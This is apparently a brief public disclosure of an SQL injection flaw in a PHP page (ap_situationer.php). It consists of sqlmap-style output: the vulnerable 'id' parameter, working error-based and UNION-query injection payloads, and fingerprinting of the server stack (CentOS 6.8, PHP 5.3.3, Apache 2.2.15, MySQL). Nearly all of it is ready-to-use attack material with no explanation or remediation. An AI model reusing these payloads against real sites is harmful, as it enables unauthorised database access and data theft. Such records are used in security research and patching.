Vulnerable path (Payload):
/ap_situationer.php?id=1'%22&nid=99&type=view
Parameter: id (GET)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=-1903' OR 1 GROUP BY CONCAT(0x7162717071,(SELECT (CASE WHEN (3403=3403) THEN 1 ELSE 0 END)),0x7176707671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&nid=99&type=view
Type: UNION query
Title: MySQL UNION query (random number) - 14 columns
Payload: id=-5251' UNION ALL SELECT CONCAT(0x7162717071,0x735766496c4851644275597846796d4d79714150735a676c41596a67646d7a67637667656767514e,0x7176707671),1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108#&nid=99&type=view
---
[13:17:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL Unknown
Polish
English